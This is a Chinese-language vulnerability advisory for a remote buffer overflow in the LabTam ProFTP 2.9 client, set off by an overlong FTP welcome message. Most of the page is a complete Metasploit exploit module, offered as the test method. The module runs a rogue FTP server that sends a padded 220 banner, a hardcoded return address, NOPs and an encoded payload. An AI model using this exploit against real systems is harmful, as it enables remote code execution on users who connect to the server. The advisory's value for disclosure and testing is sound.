ProFTP ‘Welcome Message’远程缓冲区溢出漏洞

漏洞起因
边界条件错误
 
影响系统
LabTam ProFTP 2.9
 
不受影响系统
 
危害
远程攻击者可以利用漏洞使应用程序崩溃。
 
攻击所需条件
攻击者必须访问ProFTP 2.9客户端。
 
漏洞信息
ProFTP是一款流行的FTP服务程序。
ProFTP客户端存在一个缓冲区溢出,远程攻击者可以利用漏洞以应用程序权限执行任意指令。
服务器如果发送包含超长欢迎信息的请求给ProFTP 2.9客户端,可触发此漏洞,可导致应用程序崩溃。
 
测试方法
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
 include Msf::Exploit::Remote::TcpServer
 def initialize(info = {})
  super(update_info(info,
   ‘Name’           => ‘ProFTP 2.9 (welcome message) Remote Buffer Overflow Exploit’,
   ‘Description’    => %q{
    This module exploits a buffer overflow in the ProFTP 2.9
    client that is triggered through an excessively long welcome message.
   },
   ‘Author’   => [ ‘His0k4 <his0k4.hlm[at]gmail.com>’ ],
   ‘License’        => MSF_LICENSE,
   ‘Version’        => ‘$Revision$’,
   ‘References’     =>
    [
     [ ‘URL’, ‘http://www.labtam-inc.com/index.php?act=products&pid=1’ ],
    ],
   ‘DefaultOptions’ =>
    {
     ‘EXITFUNC’ => ‘seh’,
    },
   ‘Payload’        =>
    {
     ‘Space’    => 1000,
     ‘BadChars’ => "\x00\x0a\x0d\x20",
     ‘StackAdjustment’ => -3500,
    },
   ‘Platform’       => ‘win’,
   ‘Targets’        =>
    [
    # Tested against- xp sp3 en OK.
     [ ‘Universal’,  { ‘Ret’ => 0x6809d408 } ], # WCMDPA10
    ],
   ‘Privileged’     => false,
   ‘DefaultTarget’  => 0))
  register_options(
   [
    OptPort.new(‘SRVPORT’, [ true, "The FTP daemon port to listen on", 21 ]),
   ], self.class)
 end
 def on_client_connect(client)
  return if ((p = regenerate_payload(client)) == nil) 
  buffer =  "220 "
  buffer << rand_text_numeric(2064)
  buffer << [target.ret].pack(‘V’)
  buffer << make_nops(20)
  buffer << payload.encoded
  buffer << "\r\n"
  client.put(buffer)
 end
 
end
 
厂商解决方案
目前没有详细解决方案提供:
http://www.labtam-inc.com/index.php?act=products&pid=1
 
漏洞提供者
His0k4

发表评论?

0 条评论。

发表评论